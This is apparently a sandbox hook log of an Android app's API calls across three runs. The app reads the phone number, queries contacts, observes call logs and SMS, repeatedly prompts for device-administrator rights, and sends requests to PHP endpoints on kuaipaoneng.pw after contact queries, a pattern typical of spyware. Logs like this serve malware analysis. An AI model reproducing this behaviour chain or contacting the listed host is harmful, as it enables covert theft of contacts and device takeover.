D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 5086): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/conmunk.onefivee.sofdnads-1/base.apk]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads]
D/S4URC   ( 5086): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/cache]
D/S4URC   ( 5086): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/cache]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/cache]
D/S4URC   ( 5086): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.main.MainActivity}]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 5086): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.SCREEN_OFF,android.intent.action.SCREEN_ON,
D/S4URC   ( 5086): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://call_log/calls]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml.bak]
D/S4URC   ( 5086): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml.bak]
D/S4URC   ( 5086): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml.bak]
D/S4URC   ( 5086): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][tmp] [Value][024001019026004019028026023029019092003003]
D/S4URC   ( 5086): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs]
D/S4URC   ( 5086): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml.bak]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][contact] [Return][false]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$MD5]
D/S4URC   ( 5086): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/raw_contacts]
D/S4URC   ( 5086): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/data]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 5086): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 5086): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 5086): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 5086): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/8b6295229aa8470850b158723fe7fb90.php?type=contect]
D/S4URC   ( 5086): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/8b6295229aa8470850b158723fe7fb90.php?type=contect]
D/S4URC   ( 5086): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.main.MainActivity}]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.main.DeviceActivity}]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.app.action.ADD_DEVICE_ADMIN]
D/S4URC   ( 5086): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][key : value :android.app.extra.DEVICE_ADMIN ,ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.kit.UserDevice} ]
D/S4URC   ( 5086): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][[key:value][android.app.extra.DEVICE_ADMIN:ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.kit.UserDevice}]]
D/S4URC   ( 5086): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][tmp] [Value][024001019026004019028026023029019092003003]
D/S4URC   ( 5086): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][contact] [Return][false]
D/S4URC   ( 5086): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/raw_contacts]
D/S4URC   ( 5086): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/data]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/cdc521fcc3f2a154d2efbab2a7bb2cec.php?type=contect]
D/S4URC   ( 5086): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/cdc521fcc3f2a154d2efbab2a7bb2cec.php?type=contect]
D/S4URC   ( 5086): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.main.DeviceActivity}]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.app.action.ADD_DEVICE_ADMIN]
D/S4URC   ( 5086): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][key : value :android.app.extra.DEVICE_ADMIN ,ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.kit.UserDevice} ]
D/S4URC   ( 5086): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][[key:value][android.app.extra.DEVICE_ADMIN:ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.kit.UserDevice}]]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/8f57686b759c2bcd4bda56af6638ce0d.php]
D/S4URC   ( 5086): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/8f57686b759c2bcd4bda56af6638ce0d.php]
D/S4URC   ( 5086): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5086): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5086): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5086): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/57a97e73aa131fe2d6dd096c679b50da.php]
D/S4URC   ( 5086): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/57a97e73aa131fe2d6dd096c679b50da.php]
D/S4URC   ( 5086): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 5086): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 5711): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/conmunk.onefivee.sofdnads-1/base.apk]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads]
D/S4URC   ( 5711): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/cache]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/cache]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 5711): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 5711): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5711): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://sms/]
D/S4URC   ( 5711): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.SCREEN_OFF,android.intent.action.SCREEN_ON,
D/S4URC   ( 5711): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://call_log/calls]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml.bak]
D/S4URC   ( 5711): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5711): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml.bak]
D/S4URC   ( 5711): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [java.io.File] [canRead] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5711): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][tmp] [Value][024001019026004019028026023029019092003003]
D/S4URC   ( 5711): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][contact] [Return][false]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLMessageDigestJDK$MD5]
D/S4URC   ( 5711): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/raw_contacts]
D/S4URC   ( 5711): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/data]
D/S4URC   ( 5711): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 5711): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 5711): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 5711): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/b8046d31c33d5c83a5a1e47935e82393.php?type=contect]
D/S4URC   ( 5711): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/b8046d31c33d5c83a5a1e47935e82393.php?type=contect]
D/S4URC   ( 5711): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.main.DeviceActivity}]
D/S4URC   ( 5711): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5711): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.app.action.ADD_DEVICE_ADMIN]
D/S4URC   ( 5711): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][key : value :android.app.extra.DEVICE_ADMIN ,ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.kit.UserDevice} ]
D/S4URC   ( 5711): [SDK] [android.app.Activity] [startActivityForResult] [Intent][Intent { act=android.app.action.ADD_DEVICE_ADMIN (has extras) }] [Exrar][[key:value][android.app.extra.DEVICE_ADMIN:ComponentInfo{conmunk.onefivee.sofdnads/conmunk.onefivee.sofdnads.kit.UserDevice}]]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][putString] [Key][tmp] [Value][024001019026004019028026023029019092003003]
D/S4URC   ( 5711): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][contact] [Return][false]
D/S4URC   ( 5711): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/raw_contacts]
D/S4URC   ( 5711): [SDK] [android.content.ContentResolver] [query] [URL][String] [content://com.android.contacts/data]
D/S4URC   ( 5711): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5711): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 5711): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/45a93add8944702cafae3472a280133c.php?type=contect]
D/S4URC   ( 5711): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/45a93add8944702cafae3472a280133c.php?type=contect]
D/S4URC   ( 5711): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.intent.action.MAIN]
D/S4URC   ( 5711): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/conmunk.onefivee.sofdnads/shared_prefs/config.xml]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 5711): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][config.xml] [MODE][MODE_PRIVATE] [Method][getString] [String][tmp] [Return][024001019026004019028026023029019092003003]
D/S4URC   ( 5711): [SDK] [android.telephony.TelephonyManager] [getLine1Number]
D/S4URC   ( 5711): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://kuaipaoneng.pw:8079/animi/78c9df305b85f88f06447e06120544ae.php]
D/S4URC   ( 5711): [SDK] [java.net] [HttpURLConnection] [Request][Method] [GET] [URL][String] [http://kuaipaoneng.pw:8079/animi/78c9df305b85f88f06447e06120544ae.php]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 5844): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
